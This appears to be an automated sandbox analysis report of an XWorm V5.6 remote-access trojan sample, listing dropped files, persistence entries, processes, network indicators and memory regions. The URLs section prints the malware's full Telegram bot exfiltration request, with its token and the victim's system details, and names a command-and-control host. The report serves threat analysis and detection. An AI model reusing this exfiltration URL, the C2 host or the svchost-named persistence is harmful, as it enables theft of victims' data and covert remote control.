Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
yF21ypxRB7.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\svchost.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Nov 17 17:24:09
2024, mtime=Sun Nov 17 17:24:09 2024, atime=Sun Nov 17 17:24:09 2024, length=39936, window=hide
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\yF21ypxRB7.exe
|
"C:\Users\user\Desktop\yF21ypxRB7.exe"
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k NetworkService -p
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k UnistackSvcGroup
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
|
|
|
|
C:\Users\user\AppData\Roaming\svchost.exe
|
"C:\Users\user\AppData\Roaming\svchost.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\svchost.exe
|
"C:\Users\user\AppData\Roaming\svchost.exe"
|
|
|
|
C:\Program Files\Windows Defender\MpCmdRun.exe
|
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
perfect-invest.gl.at.ply.gg
|
|
||
|
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Routes/
|
unknown
|
||
|
https://api.telegram.org/bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
|
149.154.167.220
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Driving
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Transit/Stops/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Walking
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
|
unknown
|
||
|
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
|
unknown
|
||
|
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Locations
|
unknown
|
||
|
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
|
unknown
|
||
|
https://dev.virtualearth.net/mapcontrol/logging.ashx
|
unknown
|
||
|
https://dev.ditu.live.com/mapcontrol/logging.ashx
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Transit/Schedules/
|
unknown
|
||
|
https://dynamic.t
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Transit
|
unknown
|
||
|
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
|
unknown
|
||
|
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
|
unknown
|
||
|
http://www.bingmapsportal.comsv
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Locations
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
|
unknown
|
||
|
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
perfect-invest.gl.at.ply.gg
|
147.185.221.23
|
|
|
|
api.telegram.org
|
149.154.167.220
|
||
|
time.windows.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
147.185.221.23
|
perfect-invest.gl.at.ply.gg
|
United States
|
|
|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
|
STATE
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
|
cval
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
svchost
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yF21ypxRB7_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
|
LastKnownGoodTime
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
472000
|
unkown
|
page readonly
|
|
|
|
2830000
|
heap
|
page execute and read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
3F94FE000
|
stack
|
page readonly
|
||
|
270C9BF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC47D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC494000
|
trusted library allocation
|
page read and write
|
||
|
1B9B0000
|
heap
|
page read and write
|
||
|
1EDEF713000
|
heap
|
page read and write
|
||
|
3F947D000
|
stack
|
page read and write
|
||
|
1FE6DA4B000
|
heap
|
page read and write
|
||
|
1AC28000
|
heap
|
page read and write
|
||
|
AC3000
|
heap
|
page read and write
|
||
|
E43727E000
|
unkown
|
page readonly
|
||
|
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC462000
|
trusted library allocation
|
page read and write
|
||
|
11719340000
|
heap
|
page read and write
|
||
|
132A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC510000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB068A5000
|
unkown
|
page readonly
|
||
|
11719502000
|
heap
|
page read and write
|
||
|
27E79836000
|
heap
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC453000
|
trusted library allocation
|
page execute and read and write
|
||
|
9AB000
|
heap
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB068A2000
|
unkown
|
page readonly
|
||
|
2820000
|
heap
|
page read and write
|
||
|
1171943D000
|
heap
|
page read and write
|
||
|
132A8000
|
trusted library allocation
|
page read and write
|
||
|
E43687E000
|
unkown
|
page readonly
|
||
|
7FFAAC46D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FE6DB02000
|
heap
|
page read and write
|
||
|
7FFB06896000
|
unkown
|
page readonly
|
||
|
1C2D8000
|
stack
|
page read and write
|
||
|
32A1000
|
trusted library allocation
|
page read and write
|
||
|
E10000
|
heap
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
27FE000
|
stack
|
page read and write
|
||
|
7FFAAC4AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
9B7F0FE000
|
stack
|
page read and write
|
||
|
8E0000
|
heap
|
page read and write
|
||
|
12948000
|
trusted library allocation
|
page read and write
|
||
|
1EDEF570000
|
heap
|
page read and write
|
||
|
27E79841000
|
heap
|
page read and write
|
||
|
A3D000
|
heap
|
page read and write
|
||
|
A2D000
|
heap
|
page read and write
|
||
|
1424000
|
heap
|
page read and write
|
||
|
1FE6D950000
|
heap
|
page read and write
|
||
|
270C9AC0000
|
heap
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
|
27E79902000
|
heap
|
page read and write
|
||
|
1FE6D9A0000
|
remote allocation
|
page read and write
|
||
|
7FFAAC510000
|
trusted library allocation
|
page read and write
|
||
|
1BDDC000
|
stack
|
page read and write
|
||
|
1FE6DA40000
|
heap
|
page read and write
|
||
|
270C9AE0000
|
heap
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
3F9CFE000
|
stack
|
page read and write
|
||
|
1EDEFE00000
|
heap
|
page read and write
|
||
|
1FE6D870000
|
heap
|
page read and write
|
||
|
27E7983E000
|
heap
|
page read and write
|
||
|
7FFAAC474000
|
trusted library allocation
|
page read and write
|
||
|
27E7985A000
|
heap
|
page read and write
|
||
|
27E79838000
|
heap
|
page read and write
|
||
|
B02000
|
heap
|
page read and write
|
||
|
1B4E0000
|
heap
|
page execute and read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
1FE6D9A0000
|
remote allocation
|
page read and write
|
||
|
1EDEF700000
|
heap
|
page read and write
|
||
|
27E797D0000
|
heap
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
|
1C63F000
|
stack
|
page read and write
|
||
|
270C9C13000
|
heap
|
page read and write
|
||
|
27E79F30000
|
trusted library allocation
|
page read and write
|
||
|
EF7D77E000
|
stack
|
page read and write
|
||
|
7FFB06880000
|
unkown
|
page readonly
|
||
|
1ADF0000
|
heap
|
page execute and read and write
|
||
|
7FFAAC493000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
1FE6D850000
|
heap
|
page read and write
|
||
|
580000
|
unkown
|
page readonly
|
||
|
1BA90000
|
heap
|
page execute and read and write
|
||
|
1FE6DA60000
|
heap
|
page read and write
|
||
|
1FE6DA4C000
|
heap
|
page read and write
|
||
|
27E7986C000
|
heap
|
page read and write
|
||
|
1FE6D980000
|
trusted library allocation
|
page read and write
|
||
|
98C000
|
heap
|
page read and write
|
||
|
1FE6DA24000
|
heap
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
EF7D57F000
|
stack
|
page read and write
|
||
|
270CB5F0000
|
remote allocation
|
page read and write
|
||
|
12941000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
|
1EDEF490000
|
heap
|
page read and write
|
||
|
27E79813000
|
heap
|
page read and write
|
||
|
1FE6E202000
|
trusted library allocation
|
page read and write
|
||
|
27E79868000
|
heap
|
page read and write
|
||
|
27E79859000
|
heap
|
page read and write
|
||
|
27E79800000
|
heap
|
page read and write
|
||
|
D3C000
|
stack
|
page read and write
|
||
|
1EDEFE02000
|
heap
|
page read and write
|
||
|
270CB5B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
270CB602000
|
trusted library allocation
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
9F3000
|
heap
|
page read and write
|
||
|
1BB9E000
|
stack
|
page read and write
|
||
|
28F8000
|
trusted library allocation
|
page read and write
|
||
|
27E79852000
|
heap
|
page read and write
|
||
|
E436C7E000
|
unkown
|
page readonly
|
||
|
1B71D000
|
stack
|
page read and write
|
||
|
1EDEF64D000
|
heap
|
page read and write
|
||
|
3FA1FD000
|
stack
|
page read and write
|
||
|
11719370000
|
trusted library allocation
|
page read and write
|
||
|
13F0000
|
heap
|
page execute and read and write
|
||
|
1B2F3000
|
heap
|
page read and write
|
||
|
1441000
|
heap
|
page read and write
|
||
|
270C9BC0000
|
heap
|
page read and write
|
||
|
3F8F4B000
|
stack
|
page read and write
|
||
|
1450000
|
heap
|
page read and write
|
||
|
7FFAAC470000
|
trusted library allocation
|
page read and write
|
||
|
BA3000
|
trusted library allocation
|
page read and write
|
||
|
E43707E000
|
unkown
|
page readonly
|
||
|
27E7984E000
|
heap
|
page read and write
|
||
|
3F92FE000
|
unkown
|
page readonly
|
||
|
C20000
|
heap
|
page read and write
|
||
|
7FFAAC464000
|
trusted library allocation
|
page read and write
|
||
|
148C000
|
heap
|
page read and write
|
||
|
27E79842000
|
heap
|
page read and write
|
||
|
270C9D13000
|
heap
|
page read and write
|
||
|
1ADBE000
|
stack
|
page read and write
|
||
|
1FE6DA60000
|
heap
|
page read and write
|
||
|
27E79862000
|
heap
|
page read and write
|
||
|
27E7985B000
|
heap
|
page read and write
|
||
|
7FFAAC49D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1802000
|
heap
|
page read and write
|
||
|
1EDEF702000
|
heap
|
page read and write
|
||
|
1EDEF641000
|
heap
|
page read and write
|
||
|
11719448000
|
heap
|
page read and write
|
||
|
294C000
|
trusted library allocation
|
page read and write
|
||
|
1B9B2000
|
heap
|
page read and write
|
||
|
1EDEF68E000
|
heap
|
page read and write
|
||
|
32B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4A2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page execute and read and write
|
||
|
E436E7E000
|
unkown
|
page readonly
|
||
|
27E79850000
|
heap
|
page read and write
|
||
|
1C43E000
|
stack
|
page read and write
|
||
|
26B0000
|
heap
|
page read and write
|
||
|
E4365CE000
|
stack
|
page read and write
|
||
|
27E7986E000
|
heap
|
page read and write
|
||
|
27E79831000
|
heap
|
page read and write
|
||
|
AAF000
|
heap
|
page read and write
|
||
|
27E7988E000
|
heap
|
page read and write
|
||
|
270C9D00000
|
heap
|
page read and write
|
||
|
F90000
|
heap
|
page read and write
|
||
|
28A1000
|
trusted library allocation
|
page read and write
|
||
|
2810000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC45D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1002000
|
heap
|
page read and write
|
||
|
270C9C40000
|
heap
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
1BEFE000
|
stack
|
page read and write
|
||
|
9B7F37E000
|
stack
|
page read and write
|
||
|
7FFAAC4EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1437000
|
heap
|
page read and write
|
||
|
27E79857000
|
heap
|
page read and write
|
||
|
7FFAAC4B4000
|
trusted library allocation
|
page read and write
|
||
|
128A1000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
unkown
|
page readonly
|
||
|
3F9FFE000
|
unkown
|
page readonly
|
||
|
E436BFE000
|
stack
|
page read and write
|
||
|
270C9D28000
|
heap
|
page read and write
|
||
|
1C1DA000
|
stack
|
page read and write
|
||
|
1C8DA000
|
stack
|
page read and write
|
||
|
3F9EFD000
|
stack
|
page read and write
|
||
|
27E79893000
|
heap
|
page read and write
|
||
|
1444000
|
heap
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
270CB5F0000
|
remote allocation
|
page read and write
|
||
|
1FE6D9A0000
|
remote allocation
|
page read and write
|
||
|
270C9D02000
|
heap
|
page read and write
|
||
|
E436D7E000
|
stack
|
page read and write
|
||
|
270C9C02000
|
heap
|
page read and write
|
||
|
128B1000
|
trusted library allocation
|
page read and write
|
||
|
E436F7E000
|
stack
|
page read and write
|
||
|
A49000
|
heap
|
page read and write
|
||
|
1475000
|
heap
|
page read and write
|
||
|
1FE6DA5C000
|
heap
|
page read and write
|
||
|
1BCDB000
|
stack
|
page read and write
|
||
|
1502000
|
heap
|
page read and write
|
||
|
7FFAAC4AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FE6DA00000
|
heap
|
page read and write
|
||
|
9B7ED9B000
|
stack
|
page read and write
|
||
|
1EDEF600000
|
heap
|
page read and write
|
||
|
1EDEF62B000
|
heap
|
page read and write
|
||
|
16FF000
|
stack
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
27E79877000
|
heap
|
page read and write
|
||
|
2610000
|
heap
|
page read and write
|
||
|
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
|
1BEDE000
|
stack
|
page read and write
|
||
|
12F1000
|
stack
|
page read and write
|
||
|
1BAE5000
|
stack
|
page read and write
|
||
|
27E79897000
|
heap
|
page read and write
|
||
|
3F927E000
|
stack
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
1102000
|
heap
|
page read and write
|
||
|
9B7F1FF000
|
stack
|
page read and write
|
||
|
27E7985C000
|
heap
|
page read and write
|
||
|
2650000
|
heap
|
page read and write
|
||
|
27E79854000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
D0F000
|
stack
|
page read and write
|
||
|
143F000
|
heap
|
page read and write
|
||
|
27E7985F000
|
heap
|
page read and write
|
||
|
11719461000
|
heap
|
page read and write
|
||
|
7FFAAC464000
|
trusted library allocation
|
page read and write
|
||
|
A26000
|
heap
|
page read and write
|
||
|
1EDEF638000
|
heap
|
page read and write
|
||
|
27E79867000
|
heap
|
page read and write
|
||
|
1A8D0000
|
trusted library allocation
|
page read and write
|
||
|
1FE6DA13000
|
heap
|
page read and write
|
||
|
EF7D27B000
|
stack
|
page read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EDEF67B000
|
heap
|
page read and write
|
||
|
1BFFE000
|
stack
|
page read and write
|
||
|
1EDEF626000
|
heap
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
11719400000
|
heap
|
page read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
|
3FA07E000
|
stack
|
page read and write
|
||
|
1B8F0000
|
heap
|
page read and write
|
||
|
2941000
|
trusted library allocation
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
270C9C2B000
|
heap
|
page read and write
|
||
|
293E000
|
stack
|
page read and write
|
||
|
3F96FD000
|
stack
|
page read and write
|
||
|
EF7D47C000
|
stack
|
page read and write
|
||
|
1C73E000
|
stack
|
page read and write
|
||
|
A13000
|
heap
|
page read and write
|
||
|
1EDEF470000
|
heap
|
page read and write
|
||
|
27E7982B000
|
heap
|
page read and write
|
||
|
7FFAAC46D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F97FE000
|
unkown
|
page readonly
|
||
|
B90000
|
trusted library allocation
|
page read and write
|
||
|
2890000
|
heap
|
page execute and read and write
|
||
|
143B000
|
heap
|
page read and write
|
||
|
1BC02000
|
heap
|
page read and write
|
||
|
1421000
|
heap
|
page read and write
|
||
|
13E0000
|
heap
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
|
270CB5F0000
|
remote allocation
|
page read and write
|
||
|
11719402000
|
heap
|
page read and write
|
||
|
27E79875000
|
heap
|
page read and write
|
||
|
E4368FE000
|
stack
|
page read and write
|
||
|
1C5E0000
|
heap
|
page read and write
|
||
|
27E79870000
|
heap
|
page read and write
|
||
|
7FFB068A0000
|
unkown
|
page read and write
|
||
|
27E79860000
|
heap
|
page read and write
|
||
|
1C53F000
|
stack
|
page read and write
|
||
|
1AE2C000
|
stack
|
page read and write
|
||
|
27E79838000
|
heap
|
page read and write
|
||
|
BA0000
|
trusted library allocation
|
page read and write
|
||
|
142C000
|
heap
|
page read and write
|
||
|
7FFAAC576000
|
trusted library allocation
|
page execute and read and write
|
||
|
1902000
|
heap
|
page read and write
|
||
|
32AF000
|
trusted library allocation
|
page read and write
|
||
|
7FF43F370000
|
trusted library allocation
|
page execute and read and write
|
||
|
32AC000
|
trusted library allocation
|
page read and write
|
||
|
E43717E000
|
stack
|
page read and write
|
||
|
27E797A0000
|
heap
|
page read and write
|
||
|
A3F000
|
heap
|
page read and write
|
||
|
AC7000
|
heap
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
7FFB06881000
|
unkown
|
page execute read
|
||
|
5B1000
|
stack
|
page read and write
|
||
|
7FFAAC463000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EDEFE15000
|
heap
|
page read and write
|
||
|
11719C02000
|
trusted library allocation
|
page read and write
|
||
|
132A3000
|
trusted library allocation
|
page read and write
|
||
|
A44000
|
heap
|
page read and write
|
||
|
270C9C65000
|
heap
|
page read and write
|
||
|
1BA60000
|
heap
|
page read and write
|
||
|
7FFAAC472000
|
trusted library allocation
|
page read and write
|
||
|
329E000
|
stack
|
page read and write
|
||
|
7FFAAC550000
|
trusted library allocation
|
page execute and read and write
|
||
|
27E79858000
|
heap
|
page read and write
|
||
|
270C9C5F000
|
heap
|
page read and write
|
||
|
A0B000
|
heap
|
page read and write
|
||
|
28F4000
|
trusted library allocation
|
page read and write
|
||
|
9EC000
|
heap
|
page read and write
|
||
|
1AE02000
|
heap
|
page read and write
|
||
|
11719470000
|
heap
|
page read and write
|
||
|
27E7A002000
|
trusted library allocation
|
page read and write
|
||
|
11719452000
|
heap
|
page read and write
|
||
|
27E79861000
|
heap
|
page read and write
|
||
|
1B9DE000
|
heap
|
page read and write
|
||
|
8F1000
|
stack
|
page read and write
|
||
|
9C2000
|
heap
|
page read and write
|
||
|
7FFAAC4BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
1171942D000
|
heap
|
page read and write
|
||
|
7FFAAC4BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
11719310000
|
heap
|
page read and write
|
||
|
11719416000
|
heap
|
page read and write
|
||
|
E0E000
|
stack
|
page read and write
|
||
|
FE0000
|
trusted library allocation
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
7FFAAC546000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FE6DA02000
|
heap
|
page read and write
|
||
|
1EDEF5A0000
|
trusted library allocation
|
page read and write
|
||
|
1400000
|
heap
|
page read and write
|
||
|
7FFAAC470000
|
trusted library allocation
|
page read and write
|
||
|
27E79835000
|
heap
|
page read and write
|
||
|
7FFAAC54C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EDEF65E000
|
heap
|
page read and write
|
||
|
A37000
|
heap
|
page read and write
|
||
|
7FFAAC546000
|
trusted library allocation
|
page read and write
|
||
|
A77000
|
heap
|
page read and write
|
||
|
270C9C00000
|
heap
|
page read and write
|
||
|
FE0000
|
trusted library allocation
|
page read and write
|
||
|
27E797C0000
|
heap
|
page read and write
|
||
|
1EDEF681000
|
heap
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27E79855000
|
heap
|
page read and write
|
||
|
E43697E000
|
unkown
|
page readonly
|
||
|
1EDEF613000
|
heap
|
page read and write
|
||
|
1B3FE000
|
stack
|
page read and write
|
||
|
1B938000
|
heap
|
page read and write
|
||
|
27E7986D000
|
heap
|
page read and write
|
||
|
A98000
|
heap
|
page read and write
|
||
|
9EE000
|
heap
|
page read and write
|
||
|
11719437000
|
heap
|
page read and write
|
||
|
12943000
|
trusted library allocation
|
page read and write
|
||
|
A28000
|
heap
|
page read and write
|
||
|
1EDEF664000
|
heap
|
page read and write
|
||
|
E4364CB000
|
stack
|
page read and write
|
||
|
27E7986B000
|
heap
|
page read and write
|
||
|
7FFAAC536000
|
trusted library allocation
|
page execute and read and write
|
||
|
EBA4BBB000
|
stack
|
page read and write
|
||
|
1B5EE000
|
stack
|
page read and write
|
||
|
1C9DA000
|
stack
|
page read and write
|
||
|
1B2F0000
|
heap
|
page read and write
|
||
|
11719330000
|
heap
|
page read and write
|
||
|
1ADC0000
|
heap
|
page read and write
|
||
|
27E7984A000
|
heap
|
page read and write
|
||
|
B7D000
|
stack
|
page read and write
|
||
|
1EDEF64B000
|
heap
|
page read and write
|
||
|
128A8000
|
trusted library allocation
|
page read and write
|
||
|
27E7984C000
|
heap
|
page read and write
|
||
|
1EDEF602000
|
heap
|
page read and write
|
||
|
970000
|
trusted library allocation
|
page read and write
|
||
|
27E79848000
|
heap
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
BE5000
|
heap
|
page read and write
|
||
|
270C9C70000
|
heap
|
page read and write
|
||
|
7FFAAC454000
|
trusted library allocation
|
page read and write
|
||
|
3FA2FE000
|
unkown
|
page readonly
|
||
|
1B7EF000
|
stack
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
7FFAAC580000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F9DFE000
|
unkown
|
page readonly
|
||
|
14B1000
|
heap
|
page read and write
|
||
|
1413000
|
heap
|
page read and write
|
||
|
A41000
|
heap
|
page read and write
|
||
|
EBA507E000
|
unkown
|
page readonly
|
||
|
47C000
|
unkown
|
page readonly
|
||
|
1B6EE000
|
stack
|
page read and write
|
||
|
27E7985D000
|
heap
|
page read and write
|
||
|
A46000
|
heap
|
page read and write
|
||
|
1FE6DA31000
|
heap
|
page read and write
|
||
|
11719413000
|
heap
|
page read and write
|
||
|
17FF000
|
stack
|
page read and write
|
||
|
EBA4F7E000
|
stack
|
page read and write
|
||
|
283E000
|
stack
|
page read and write
|
||
|
1C0DE000
|
stack
|
page read and write
|
||
|
3FA0FE000
|
unkown
|
page readonly
|
||
|
C25000
|
heap
|
page read and write
|
||
|
27BE000
|
stack
|
page read and write
|
There are 371 hidden memdumps, click here to show them.